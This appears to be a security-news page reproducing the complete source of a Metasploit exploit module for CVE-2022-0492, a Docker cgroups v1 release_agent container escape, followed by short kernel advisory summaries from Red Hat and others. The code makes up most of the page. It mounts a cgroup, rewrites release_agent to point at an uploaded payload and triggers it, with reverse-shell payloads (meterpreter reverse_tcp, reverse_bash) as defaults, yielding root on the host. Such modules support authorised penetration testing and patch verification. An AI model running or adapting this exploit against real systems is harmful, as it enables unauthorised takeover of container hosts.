Headline
Docker cgroups Container Escape
This Metasploit exploit module takes advantage of a Docker image which has either the privileged flag, or SYS_ADMIN Linux capability. If the host kernel is vulnerable, its possible to escape the Docker image and achieve root on the host operating system. A vulnerability was found in the Linux kernel’s cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function. This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges and bypass the namespace isolation unexpectedly.
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html include Msf::Post::Linux::Priv include Msf::Post::Linux::Kernel include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Docker cgroups Container Escape', 'Description' => %q{ This exploit module takes advantage of a Docker image which has either the privileged flag, or SYS_ADMIN Linux capability. If the host kernel is vulnerable, its possible to escape the Docker image and achieve root on the host operating system. A vulnerability was found in the Linux kernel's cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function. This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges and bypass the namespace isolation unexpectedly. More simply put, cgroups v1 has a feature called release_agent that runs a program when a process in the cgroup terminates. If notify_on_release is enabled, the kernel runs the release_agent binary as root. By editing the release_agent file, an attacker can execute their own binary with elevated privileges, taking control of the system. However, the release_agent file is owned by root, so only a user with root access can modify it. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Yiqi Sun', # discovery 'Kevin Wang', # discovery 'T1erno', # POC ], 'Platform' => [ 'unix', 'linux' ], 'SessionTypes' => ['meterpreter'], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }, 'Privileged' => true, 'References' => [ [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=24f6008564183aa120d07c03d9289519c2fe02af'], [ 'URL', 'https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/'], [ 'URL', 'https://github.com/T1erno/CVE-2022-0492-Docker-Breakout-Checker-and-PoC'], [ 'URL', 'https://github.com/PaloAltoNetworks/can-ctr-escape-cve-2022-0492'], [ 'URL', 'https://github.com/SofianeHamlaoui/CVE-2022-0492-Checker/blob/main/escape-check.sh'], [ 'URL', 'https://pwning.systems/posts/escaping-containers-for-fun/'], [ 'URL', 'https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html'], [ 'URL', 'https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation'], [ 'URL', 'https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/'], [ 'CVE', '2022-0492'] ], 'DisclosureDate' => '2022-02-04', 'Targets' => [ ['BINARY', { 'Arch' => [ARCH_X86, ARCH_X64], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } }], ['CMD', { 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } }] ], 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ARTIFACTS_ON_DISK] } ) ) register_advanced_options [ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) ] end def base_dir datastore['WritableDir'] end def check print_status('Unable to determine host OS, this check method is unlikely to be accurate if the host isn\'t Ubuntu') release = kernel_release # https://people.canonical.com/~ubuntu-security/cve/2022/CVE-2022-0492 release_short = Rex::Version.new(release.split('-').first) release_long = Rex::Version.new(release.split('-')[0..1].join('-')) if release_short >= Rex::Version.new('5.13.0') && release_long < Rex::Version.new('5.13.0-37.42') || # Ubuntu 21.10 release_short >= Rex::Version.new('5.4.0') && release_long < Rex::Version.new('5.4.0-105.119') || # Ubuntu 20.04 LTS release_short >= Rex::Version.new('4.15.0') && release_long < Rex::Version.new('4.15.0-173.182') || # Ubuntu 18.04 LTS release_short >= Rex::Version.new('4.4.0') && release_long < Rex::Version.new('4.4.0-222.255') # Ubuntu 16.04 ESM return CheckCode::Vulnerable("IF host OS is Ubuntu, kernel version #{release} is vulnerable") end CheckCode::Safe("Kernel version #{release} may not be vulnerable depending on the host OS") end def exploit # Check if we're already root as its required fail_with(Failure::NoAccess, 'The exploit needs a session as root (uid 0) inside the container') unless is_root? # create mount folder = rand_text_alphanumeric(5..10) @mount_dir = "#{base_dir}/#{folder}" register_dir_for_cleanup(@mount_dir) vprint_status("Creating folder for mount: #{@mount_dir}") mkdir(@mount_dir) print_status('Mounting cgroup') cmd_exec("mount -t cgroup -o rdma cgroup '#{@mount_dir}'") group = rand_text_alphanumeric(5..10) group_full_dir = "#{@mount_dir}/#{group}" vprint_status("Creating folder in cgroup for exploitation: #{group_full_dir}") mkdir(group_full_dir) print_status("Enabling notify on release for group #{group}") write_file("#{group_full_dir}/notify_on_release", '1') print_status('Determining the host OS path for image') # for this, we need the line that starts with overlay, and contains an 'upperdir' parameter, which we want the value of mtab_file = read_file('/etc/mtab') host_path = nil mtab_file.each_line do |line| next unless line.start_with?('overlay') && line.include?('perdir') # upperdir line.split(',').each do |parameter| next unless parameter.start_with?('upperdir') parameter = parameter.split('=') fail_with(Failure::UnexpectedReply, 'Unable to determine docker image path on host OS') unless parameter.length > 1 host_path = parameter[1] end break end fail_with(Failure::UnexpectedReply, 'Unable to determine docker image path on host OS') if host_path.nil? || host_path.empty? || host_path.start_with?('sed') # start_with catches repeat of command vprint_status("Host OS path for image: #{host_path}") payload_path = "#{base_dir}/#{rand_text_alphanumeric(5..10)}" print_status("Setting release_agent path to: #{host_path}#{payload_path}") write_file "#{@mount_dir}/release_agent", "#{host_path}#{payload_path}" print_status("Uploading payload to #{payload_path}") if target.name == 'CMD' # for whatever reason it's unhappy and wont run without the /bin/sh header upload_and_chmodx payload_path, "#!/bin/sh\n#{payload.encoded}\n" elsif target.name == 'BINARY' upload_and_chmodx payload_path, generate_payload_exe end register_files_for_cleanup(payload_path) print_status("Triggering payload with command: sh -c \"echo \$\$ > #{group_full_dir}/cgroup.procs\"") cmd_exec(%(sh -c "echo \$\$ > '#{group_full_dir}/cgroup.procs'")) end def cleanup if @mount_dir vprint_status("Cleanup: Unmounting #{@mount_dir}") cmd_exec("umount '#{@mount_dir}'") end super endendRelated news
Vulnerability of pointers being incorrectly used during data transmission in the video framework. Successful exploitation of this vulnerability may affect confidentiality.
In param_find_digests_internal and related functions of the Titan-M source, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-222472803References: N/A
It was discovered that a race condition existed in the network scheduling subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. Yiqi Sun and Kevin Wang discovered that the cgroups implementation in the Linux kernel did not properly restrict access to the cgroups v1 release_agent feature. A local attacker could use this to gain administrative privileges. Various other issues were also addressed.
An update for kernel is now available for Red Hat Enterprise Linux 7.7 Advanced Update Support, Red Hat Enterprise Linux 7.7 Telco Extended Update Support, and Red Hat Enterprise Linux 7.7 Update Services for SAP Solutions. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-0492: kernel: cgroups v1 release_agent feature may allow privilege escalation
An update is now available for Red Hat Enterprise Linux 7.7 Update Services for SAP Solutions. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-0492: kernel: cgroups v1 release_agent feature may allow privilege escalation
Red Hat Security Advisory 2022-4642-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include null pointer and privilege escalation vulnerabilities.
An update for kernel is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-0492: kernel: cgroups v1 release_agent feature may allow privilege escalation
Red Hat Security Advisory 2022-2186-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include privilege escalation and use-after-free vulnerabilities.
An update for kpatch-patch is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-4028: kernel: use-after-free in RDMA listen() * CVE-2022-0492: kernel: cgroups v1 release_agent feature may allow privilege escalation
An update for kernel is now available for Red Hat Enterprise Linux 7.6 Advanced Update Support, Red Hat Enterprise Linux 7.6 Telco Extended Update Support, and Red Hat Enterprise Linux 7.6 Update Services for SAP Solutions. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-4028: kernel: use-after-free in RDMA listen() * CVE-2022-0492: kernel: cgroups v1 release_agent feature may allow privilege escalation